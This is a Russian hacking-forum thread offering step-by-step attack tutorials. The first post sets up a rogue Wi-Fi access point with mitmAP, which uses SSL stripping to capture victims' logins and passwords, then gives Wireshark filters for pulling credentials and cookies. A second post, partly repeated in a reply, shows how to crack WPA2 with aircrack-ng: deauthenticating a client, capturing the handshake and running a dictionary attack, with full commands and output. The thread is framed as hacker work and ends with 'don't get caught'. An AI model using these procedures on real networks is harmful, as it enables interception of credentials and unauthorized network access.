Wi-Fi сниффер

Andr0_0id

Участник форума
Регистрация
21 Июл 2019
Сообщения
24
114

День добрый, дорогие друзья. Сегодня я бы хотел посветить данную статью одному очень заманчивому скрипту. И носит он название mitmAP. Вещь довольно интересная на данный момент. Поэтому без каких-либо промедлений давайте приступим к делу. Погнали.

Что Это?
115


mitmAP - небольшой скрипт написанный на Python3. Он создает беспроводные точки доступа (Wi-Fi) и запускает сниффер для перехвата логинов и паролей.

Так же по мимо этого он способен почти без какого-либо ввода команд использовать современные на данный момент способы понижения https:// до http:// Простым языком все пароли передаются в открытом виде. Так же для любителей компакта (Raspberry PI) создатели оптимизировали данный скрипт под такой тип микрокомпьютеров. Ну а для любителей стандарта можно запускать его на Kali Linux.


Установка

116

И так. Давайте скопируем данный скрипт себе на ПК.


git clone https://github.com/xdavidhu/mitmAP.git

Дальше переходим в директорию.


cd mitmAP/

И запускаем.


sudo python3 mitmAP.py

И после запуска вам зададут данный вопрос:


[?] Install/Update dependencies? Y/n:
[?] Установить / обновить зависимости? Да/Нет:
Если у вас запуск первый то говорите Да (Y), если же случай другой и это не первый раз, то вводим Нет (N). Идем к следующему вопросу.

[?] Please enter the name of your wireless interface (for the AP):
[?] Введите имя вашего беспроводного интерфейса (для ТД):
Если вы не знаете имя вашего интерфейса, то открывайте новое окно и пишите:

Она покажет вам все сетевые интерфейсы. Ну а нам нужен только беспроводной. Поэтому пишем:

В Kali Linux по умолчанию беспроводные интерфейсы называются wlan0 (или же wlan1). Проследуем далее.

[?] Please enter the name of your internet connected interface:
[?] Пожалуйста, введите имя интерфейса, подключённого к Интернету:
В Kali Linux проводной интерфейс называется eth0. Но можно использовать и вторую Wi-Fi карту. Переходим к следующему вопросу.

[?] Use SSLSTRIP 2.0? Y/n:
[?] Использовать SSLstrip 2.0? Да/Нет:
Здесь нужно написать Да (Y). Так как почти весь трафик передается в зашифрованном виде. И для его расшифровки данная вещь очень нужна. Двигаем далее.

[?] Create new HOSTAPD config file at '/etc/hostapd/hostapd.conf' Y/n:
[?] Создать ли новый конфигурационный файл hostapd в '/etc/hostapd/hostapd.conf' Да/Нет:
При первом запуске это делать обязательно нужно. Поэтому вводим Да (Y). В дальнейшем можете это пропускать говоря скрипту Нет (N).

[?] Please enter the SSID for the AP:
[?] Введите имя для Точки Доступа:
Ну здесь выбираете любое имя. И двигаем дальше.

[?] Please enter the channel for the AP:
[?] Введите номер канала для Точки доступа:
Здесь тоже можете пораскинуть мозгами и ввести то, что вам нужно. Ну а мы продолжаем.

[?] Enable WPA2 encryption? y/N:
[?] Включить ли WPA2 шифрование? Да/Нет:
Здесь если для вашей точки доступа нужен пароль, то вводим Да (Y). Если же не нужен, то Нет (N).

[?] Set speed limit for the clients? Y/n:
[?] Установить ли ограничение по скорости для клиентов? Да/Нет:
Здесь выбираем Нет (N).

[?] Start WIRESHARK on wlan0? Y/n:
[?] Запустить ли Wireshark на интерфейсе wlan0? Да/Нет:
Нужно поставить Да (Y).

[?] Spoof DNS manually? y/N:
[?] Осуществлять ли ручной DNS спуфинг? Да/Нет:
Ставим Нет (N) так как нам не нужны лишние заморочки) Но если вы поставили Да (Y). То читайте это.117

Анализ

Все логины и пароли наш скрипт выводит в главном окне. И выглядит это примерно так:
118

В корневой папке вы можете найти файл logs. С двумя конечными документами: mitmap-sslstrip.log и mitmap-wireshark.pcap. В первом файле все лежит в текстовом формате, а во втором все для анализа через программу WireShark.

ВНИМАНИЕ!!! При перезагрузке скрипта данные файлы стираются. Поэтому позаботьтесь о создании резервной копии на тот случай если вы решили анализировать это позднее.

Если вы выбрали запуск окна Wireshark и отображение передаваемых изображений с помощью Driftnet, то вы также их сможете использовать для мониторинга передаваемых данных в реальном времени.


Справка по анализу данных в WireShark

Чтобы вы могли разбираться при анализе данных в данной программе приведу парочку примеров фильтрации данных. Все вводите в поисковик программы.

Для отображения в Wireshark всех HTTP запросов, переданных методом POST:


http.request.method == "POST"



Для отображения данных переданных или полученных с определённого домена (вместо <URL> введите интересующий домен, например, vk.com):


http.host=="<URL>"



Для поиска строки во всём потоке передаваемых данных используется следующий фильтр (вместо <строка> введите строку, которую вы хотите искать):


frame contains "<строка>"



Для отображения кукиз в Wireshark:


http.cookie



Если вас интересует кукиз с определёнными именем, то используйте:


http.cookie contains "<имя_куки>"



Для показа запросов в Wireshark, переданных методом GET или POST:


http.request.uri contains "?" or http.request.method=="POST"



Если вы хотите найти данные обмена с FTP сервером, то в Wireshark можете использовать один из следующих фильтров:


ftp или tcp.port==21 || tcp.port==20


Все. Если вы закончили работу с данной программой просто быстро нажмите два раза сочетания клавиш
CTRL + C.


Вывод

mitmAP довольно полезен в работе хакера. Он современный и поэтому может сыграть большую роль при работе хакера. Поэтому пользуйтесь. А я желаю вам удачи и не попадитесь ;)
 

Anubis

Участник форума
Регистрация
13 Июл 2019
Сообщения
6
Надеюсь тс, не будет против, дабы не плодить темы, вставлю свои 3 копеки) Раньше тема работала, сейчас не знаю (кстати тс, ты вроде шаришь, отпишись, тема по рукопожатиям еще работает, не в курсе? А то я Кали снес уже давненько.

Понадобится Kali Linux и роутер. (я на обычном tp link делал)

И так поехали..
Открываете консоль
Вводите
iwconfig - показывает список доступных wifi адаптеров

_______________________________________________________
o no wireless extensions.

wlan0 IEEE 802.11bgn ESSID:"187"
Mode:Managed Frequency:2.437 GHz Access Point: 18:A6:F7:BA:AD:DE
Bit Rate=1 Mb/s Tx-Power=19 dBm
Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
Link Quality=57/70 Signal level=-53 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:7 Missed beacon:0

eth0 no wireless extensions.
_______________________________________________________



wlan0 - это интерфейс беспроводной wifi карты моего ноута? теперь нужно его перевести в режим мониторинга.
Для этого вводим следующую команду:


airmon-ng start wlan0

Появляется
_______________________________________________________

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
1355 NetworkManager
1525 wpa_supplicant
2563 dhclient

PHY Interface Driver Chipset

phy0 wlan0 brcmsmac Broadcom on bcma bus, information limited

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)

_______________________________________________________

Что бы убедиться, что режим мониторинга включен, смотрим на эту запись из таблицы выше:
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
Эта запись говорит,что режим мониторинга разрешен и и сейчас он имеет интерфейс wlan0

Далее вводим следующую команду:

airmon-ng check kill -эта команда завершает все процессы связанные с интернетом, что бы они не мешали режиму мониторинга

Далее вводим следующую команду:

airodump-ng wlan0mon -эта команда покажет нам список всех доступных wifi точек

Пример:
_____________________________________________________________________________________________________________

CH 1 ][ Elapsed: 24 s ][ 2016-10-31 21:05

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

18:A6:F7:BA:AD:DE -52 97 0 0 6 54e. WPA2 CCMP PSK 187
20:4E:7F:83:0D:80 -61 50 0 0 13 54e WPA2 CCMP PSK NETGEAR_rom
94:4A:0C:E4:13:78 -61 68 8 0 1 54e WPA2 CCMP PSK Beeline_2G_73
00:1A:2B:3C:FF:02 -65 82 13 0 6 54e WPA2 CCMP PSK Dima
E0:3F:49:74:FE:F4 -69 39 1 0 1 54e WPA2 CCMP PSK qwert
BC:AE:C5:E8:2E:CA -66 28 11 0 11 54e WPA2 CCMP PSK OnLime
28:31:52:49:5E:FE -69 74 20 0 6 54e. WPA2 CCMP PSK moywifi
88:A6:C6:9A:17:23 -73 57 42 0 11 54e WPA2 CCMP PSK onlime81
FC:8B:97:50:2E:51 -73 25 0 0 12 54e WPA CCMP PSK 777
1C:5F:2B:A1:2C:2C -75 18 0 0 13 54e WPA2 CCMP PSK OnLime_82
BC:AE:C5:A7:A4:F2 -76 17 3 0 11 54 WPA2 CCMP PSK katya
40:3D:EC:35:0F:25 -76 35 0 0 6 54e WPA2 CCMP PSK AKADO-0F20
10:BF:48:E5:D4:8C -76 44 3 0 1 54e WPA2 CCMP PSK Grisha2005
80:38:BC:4E:32:BC -77 36 0 0 2 54e WPA2 CCMP PSK Get_high_420
94:4A:0C:DB:65:DA -77 25 0 0 6 54e WPA2 CCMP PSK MGTS_GPON_5684
1C:5F:2B:DF:28:51 -79 20 0 0 5 54e WPA2 CCMP PSK RT-WiFi_2.4GHz_2850
E4:68:A3:00:73:8C -78 31 2 0 9 54e. WPA2 CCMP PSK mgts_24



______________________________________________________________________________________________________________

Можно нажать ctrl+c что бы остановить режим мониторинга



ESSID -обозначает имя wifi точки
BSSID -обозначает макадрес точки

Далее нужно получить список клиентов взламываемой wifi точки

Для этого вводим команду


airodump-ng -c --bssid -w '' wlan0mon

______________________________________________________________________________________________________________
Где
-с это номер канала (выше в таблице он бозначается, как CH)
-w это где мы будем сохранять полученный хэндшейк пусть ставится между скобок ('')
- --bssid это макадрес точки доступа


Например при взломе NETGEAR_rom строка будет выглядеть так:


airodump-ng -c 13 --bssid 20:4E:7F:83:0D:80 -w '/root/hs/' wlan0mon После нажимаем Enter


После видим такую таблицу

CH 1 ][ Elapsed: 6 s ][ 2016-11-01 18:45

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

94:4A:0C:E4:13:78 -59 50 19 8 2 1 54e WPA2 CCMP PSK Beeline_2G_73

BSSID STATION PWR Rate Lost Frames Probe

Тут должны появляться подключенные клиенты, выглядеть они будут так:


20:4E:7F:83:0D:80 F0:27:65:24:22:24 -63 18e-12 0 12
20:4E:7F:83:0D:80 60:D9:A0:9A:E4:9C -67 36e- 6 1 3


В общем таблица будет выглядеть так:



CH 1 ][ Elapsed: 6 s ][ 2016-11-01 18:45

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

94:4A:0C:E4:13:78 -59 50 19 8 2 1 54e WPA2 CCMP PSK Beeline_2G_73

BSSID STATION PWR Rate Lost Frames Probe



20:4E:7F:83:0D:80 F0:27:65:24:22:24 -63 18e-12 0 12
20:4E:7F:83:0D:80 60:D9:A0:9A:E4:9C -67 36e- 6 1 3


Иногда приходится ждать,пока клиенты подключатся. Если клиент долго не подключается, то лучше выбрать другую точку

ВНИМАНИЕ! НЕ ОСТАНАВЛИВАТЬ (КТРЛ+С) ПРОЦЕСС ПОДКЛЮЧЕНИЯ КЛИЕНТОВ ОСТАНОВИТЬ МОЖНО ТОЛЬКО ПОСЛЕ ПОЛУЧЕНИЯ ХЭНДШЕЙКОВ!!!

Далее нам нужно отправить пакеты деавторизации (деаутентификации), для того что бы клиент отключился и вновь подключился, что бы в этот момент был перехват хэндшейка, так называемого четырехстороннего рукопожатия

Для этого открываем новый терминал и пишем в новом терминале:

aireplay-ng -0 4 -a -c wlan0mon

Где:

- -0 это количество пакетов
- 4 это ?
- -a это макадрес точки доступа
- -c это макадрес клиента

На примере взламываемой точки NETGEAR_rom строка будет выглядеть так:


aireplay-ng -0 4 -a 20:4E:7F:83:0D:80 -c F0:27:65:24:22:24 wlan0mon

Данные берем из списка подключенных клиентов


После будут примерно такие строки

[email protected]:~# aireplay-ng -0 4 -a 20:4E:7F:83:0D:80 -c F0:27:65:24:22:24 wlan0mon

19:01:47 Waiting for beacon frame (BSSID: 20:4E:7F:83:0D:80) on channel 13
19:01:48 Sending 64 directed DeAuth. STMAC: [F0:27:65:24:22:24] [ 1| 1 ACKs]
19:01:49 Sending 64 directed DeAuth. STMAC: [F0:27:65:24:22:24] [18| 4 ACKs]
19:01:49 Sending 64 directed DeAuth. STMAC: [F0:27:65:24:22:24] [ 0| 6 ACKs]
19:01:50 Sending 64 directed DeAuth. STMAC: [F0:27:65:24:22:24] [ 1| 4 ACKs]


а предыдущем терминале, в таблице появится дополнительная надпись - WPA handshake:(см. ниже)



CH 1 ][ Elapsed: 6 s ][ 2016-11-01 18:45] [ WPA handshake:20:4E:7F:83:0D:80 ]

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

94:4A:0C:E4:13:78 -59 50 19 8 2 1 54e WPA2 CCMP PSK Beeline_2G_73

BSSID STATION PWR Rate Lost Frames Probe


20:4E:7F:83:0D:80 F0:27:65:24:22:24 -63 18e-12 0 12
20:4E:7F:83:0D:80 60:D9:A0:9A:E4:9C -67 36e- 6 1 3

Теперь можно остановить, жмем ctr+c
Хэндшейки можно увидеть в папке (в нашем случае) hs.
Хэндшейки получены, теперь можно приступить к самой атаке

Для этого вводим команду

aircrack-ng -w -b

Где ключ -w это путь к словарю, ссылка на словарь вставляется в кавычки (')

ключ -b это макадрес точки доступа, в нашем случае это 20:4E:7F:83:0D:80 взятый из подключенных клиентов, где отображались хэндшейки после макадреса будет идти путь к хендшейку

Строка будет выглядеть так:

aircrack-ng -w '/media/root/C4DED05ADED045F8/WPA PASS/insidePRO_WPA.txt' -b 20:4E:7F:83:0D:80 '/root/hs/-01.cap'

и жмем Enter.

Далее пойдет перебор паролей. Как я понял, чем мощнее компьютер тем быстрее идет так сказать брут. потому что у меня скорость была мизерная, до 6к паролей в секунду, у чела скорость была вроде 30к пассов сек. В общем может потребоваться продолжительное время. Вообще изначально можете попробовать wifite, а после через акулу вроде как можно сканировать трафик.
Если же решите пользоваться первым способом, то не копируйте в терминал, то что нужно прописывать, пишите ручками, так быстрее запоминается)
Всем хорошего вечера!
 

Andr0_0id

Участник форума
Регистрация
21 Июл 2019
Сообщения
24
Надеюсь тс, не будет против, дабы не плодить темы, вставлю свои 3 копеки) Раньше тема работала, сейчас не знаю (кстати тс, ты вроде шаришь, отпишись, тема по рукопожатиям еще работает, не в курсе? А то я Кали снес уже давненько.

Понадобится Kali Linux и роутер. (я на обычном tp link делал)

И так поехали..
Открываете консоль
Вводите
iwconfig - показывает список доступных wifi адаптеров

_______________________________________________________
o no wireless extensions.

wlan0 IEEE 802.11bgn ESSID:"187"
Mode:Managed Frequency:2.437 GHz Access Point: 18:A6:F7:BA:AD:DE
Bit Rate=1 Mb/s Tx-Power=19 dBm
Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
Link Quality=57/70 Signal level=-53 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:7 Missed beacon:0

eth0 no wireless extensions.
_______________________________________________________



wlan0 - это интерфейс беспроводной wifi карты моего ноута? теперь нужно его перевести в режим мониторинга.
Для этого вводим следующую команду:


airmon-ng start wlan0

Появляется
_______________________________________________________

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
1355 NetworkManager
1525 wpa_supplicant
2563 dhclient

PHY Interface Driver Chipset

phy0 wlan0 brcmsmac Broadcom on bcma bus, information limited

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)

_______________________________________________________

Что бы убедиться, что режим мониторинга включен, смотрим на эту запись из таблицы выше:
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
Эта запись говорит,что режим мониторинга разрешен и и сейчас он имеет интерфейс wlan0

Далее вводим следующую команду:

airmon-ng check kill -эта команда завершает все процессы связанные с интернетом, что бы они не мешали режиму мониторинга

Далее вводим следующую команду:

airodump-ng wlan0mon -эта команда покажет нам список всех доступных wifi точек

Пример:
_____________________________________________________________________________________________________________

CH 1 ][ Elapsed: 24 s ][ 2016-10-31 21:05

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

18:A6:F7:BA:AD:DE -52 97 0 0 6 54e. WPA2 CCMP PSK 187
20:4E:7F:83:0D:80 -61 50 0 0 13 54e WPA2 CCMP PSK NETGEAR_rom
94:4A:0C:E4:13:78 -61 68 8 0 1 54e WPA2 CCMP PSK Beeline_2G_73
00:1A:2B:3C:FF:02 -65 82 13 0 6 54e WPA2 CCMP PSK Dima
E0:3F:49:74:FE:F4 -69 39 1 0 1 54e WPA2 CCMP PSK qwert
BC:AE:C5:E8:2E:CA -66 28 11 0 11 54e WPA2 CCMP PSK OnLime
28:31:52:49:5E:FE -69 74 20 0 6 54e. WPA2 CCMP PSK moywifi
88:A6:C6:9A:17:23 -73 57 42 0 11 54e WPA2 CCMP PSK onlime81
FC:8B:97:50:2E:51 -73 25 0 0 12 54e WPA CCMP PSK 777
1C:5F:2B:A1:2C:2C -75 18 0 0 13 54e WPA2 CCMP PSK OnLime_82
BC:AE:C5:A7:A4:F2 -76 17 3 0 11 54 WPA2 CCMP PSK katya
40:3D:EC:35:0F:25 -76 35 0 0 6 54e WPA2 CCMP PSK AKADO-0F20
10:BF:48:E5:D4:8C -76 44 3 0 1 54e WPA2 CCMP PSK Grisha2005
80:38:BC:4E:32:BC -77 36 0 0 2 54e WPA2 CCMP PSK Get_high_420
94:4A:0C:DB:65:DA -77 25 0 0 6 54e WPA2 CCMP PSK MGTS_GPON_5684
1C:5F:2B:DF:28:51 -79 20 0 0 5 54e WPA2 CCMP PSK RT-WiFi_2.4GHz_2850
E4:68:A3:00:73:8C -78 31 2 0 9 54e. WPA2 CCMP PSK mgts_24



______________________________________________________________________________________________________________

Можно нажать ctrl+c что бы остановить режим мониторинга



ESSID -обозначает имя wifi точки
BSSID -обозначает макадрес точки

Далее нужно получить список клиентов взламываемой wifi точки

Для этого вводим команду


airodump-ng -c --bssid -w '' wlan0mon

______________________________________________________________________________________________________________
Где
-с это номер канала (выше в таблице он бозначается, как CH)
-w это где мы будем сохранять полученный хэндшейк пусть ставится между скобок ('')
- --bssid это макадрес точки доступа


Например при взломе NETGEAR_rom строка будет выглядеть так:


airodump-ng -c 13 --bssid 20:4E:7F:83:0D:80 -w '/root/hs/' wlan0mon После нажимаем Enter


После видим такую таблицу

CH 1 ][ Elapsed: 6 s ][ 2016-11-01 18:45

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

94:4A:0C:E4:13:78 -59 50 19 8 2 1 54e WPA2 CCMP PSK Beeline_2G_73

BSSID STATION PWR Rate Lost Frames Probe

Тут должны появляться подключенные клиенты, выглядеть они будут так:


20:4E:7F:83:0D:80 F0:27:65:24:22:24 -63 18e-12 0 12
20:4E:7F:83:0D:80 60:D9:A0:9A:E4:9C -67 36e- 6 1 3


В общем таблица будет выглядеть так:



CH 1 ][ Elapsed: 6 s ][ 2016-11-01 18:45

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

94:4A:0C:E4:13:78 -59 50 19 8 2 1 54e WPA2 CCMP PSK Beeline_2G_73

BSSID STATION PWR Rate Lost Frames Probe



20:4E:7F:83:0D:80 F0:27:65:24:22:24 -63 18e-12 0 12
20:4E:7F:83:0D:80 60:D9:A0:9A:E4:9C -67 36e- 6 1 3


Иногда приходится ждать,пока клиенты подключатся. Если клиент долго не подключается, то лучше выбрать другую точку

ВНИМАНИЕ! НЕ ОСТАНАВЛИВАТЬ (КТРЛ+С) ПРОЦЕСС ПОДКЛЮЧЕНИЯ КЛИЕНТОВ ОСТАНОВИТЬ МОЖНО ТОЛЬКО ПОСЛЕ ПОЛУЧЕНИЯ ХЭНДШЕЙКОВ!!!

Далее нам нужно отправить пакеты деавторизации (деаутентификации), для того что бы клиент отключился и вновь подключился, что бы в этот момент был перехват хэндшейка, так называемого четырехстороннего рукопожатия

Для этого открываем новый терминал и пишем в новом терминале:

aireplay-ng -0 4 -a -c wlan0mon

Где:

- -0 это количество пакетов
- 4 это ?
- -a это макадрес точки доступа
- -c это макадрес клиента

На примере взламываемой точки NETGEAR_rom строка будет выглядеть так:


aireplay-ng -0 4 -a 20:4E:7F:83:0D:80 -c F0:27:65:24:22:24 wlan0mon

Данные берем из списка подключенных клиентов


После будут примерно такие строки

[email protected]:~# aireplay-ng -0 4 -a 20:4E:7F:83:0D:80 -c F0:27:65:24:22:24 wlan0mon

19:01:47 Waiting for beacon frame (BSSID: 20:4E:7F:83:0D:80) on channel 13
19:01:48 Sending 64 directed DeAuth. STMAC: [F0:27:65:24:22:24] [ 1| 1 ACKs]
19:01:49 Sending 64 directed DeAuth. STMAC: [F0:27:65:24:22:24] [18| 4 ACKs]
19:01:49 Sending 64 directed DeAuth. STMAC: [F0:27:65:24:22:24] [ 0| 6 ACKs]
19:01:50 Sending 64 directed DeAuth. STMAC: [F0:27:65:24:22:24] [ 1| 4 ACKs]


а предыдущем терминале, в таблице появится дополнительная надпись - WPA handshake:(см. ниже)



CH 1 ][ Elapsed: 6 s ][ 2016-11-01 18:45] [ WPA handshake:20:4E:7F:83:0D:80 ]

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

94:4A:0C:E4:13:78 -59 50 19 8 2 1 54e WPA2 CCMP PSK Beeline_2G_73

BSSID STATION PWR Rate Lost Frames Probe


20:4E:7F:83:0D:80 F0:27:65:24:22:24 -63 18e-12 0 12
20:4E:7F:83:0D:80 60:D9:A0:9A:E4:9C -67 36e- 6 1 3

Теперь можно остановить, жмем ctr+c
Хэндшейки можно увидеть в папке (в нашем случае) hs.
Хэндшейки получены, теперь можно приступить к самой атаке

Для этого вводим команду

aircrack-ng -w -b

Где ключ -w это путь к словарю, ссылка на словарь вставляется в кавычки (')

ключ -b это макадрес точки доступа, в нашем случае это 20:4E:7F:83:0D:80 взятый из подключенных клиентов, где отображались хэндшейки после макадреса будет идти путь к хендшейку

Строка будет выглядеть так:

aircrack-ng -w '/media/root/C4DED05ADED045F8/WPA PASS/insidePRO_WPA.txt' -b 20:4E:7F:83:0D:80 '/root/hs/-01.cap'

и жмем Enter.

Далее пойдет перебор паролей. Как я понял, чем мощнее компьютер тем быстрее идет так сказать брут. потому что у меня скорость была мизерная, до 6к паролей в секунду, у чела скорость была вроде 30к пассов сек. В общем может потребоваться продолжительное время. Вообще изначально можете попробовать wifite, а после через акулу вроде как можно сканировать трафик.
Если же решите пользоваться первым способом, то не копируйте в терминал, то что нужно прописывать, пишите ручками, так быстрее запоминается)
Всем хорошего вечера!
Я эту тему проверял, раньше в старых версиях kali linux работало. Но я последний раз тестировал в live версии. Это как раз новая была 2019 года и почему то airmon-ng отказывал в работе. Выдавал ошибку мол я не знаю такую команду и все в таком роде. Но на счет рукопажатия есть отдельные скрипты. Допустим в Fluxion. Найдешь на Github. Но там последнее время тоже возникают проблемы. Раньше все отлично работало. С airmon-ng я тестировал когда еще wi fi хотел заглушить. Да, можно было другим скриптом но что то меня потянуло на него) Короче по сути тема должна быть рабочей просто нужно будет устанавливать зависимости. Что я в то время не делал. Поэтому вот такие дела
 

Anubis

Участник форума
Регистрация
13 Июл 2019
Сообщения
6

Andr0_0id

Участник форума
Регистрация
21 Июл 2019
Сообщения
24
Live версия говорят, позволяет не весь функционал использовать. Ладно, будем тестить. Успехов тебе)
Да, это нужен тест. Спасибо, да и тебя хочу поблагодорить за совет. Теперь есть побочная цель, которая может стать темой для статьи :D
 

boweman

Участник форума
Регистрация
20 Окт 2019
Сообщения
5
good for beginners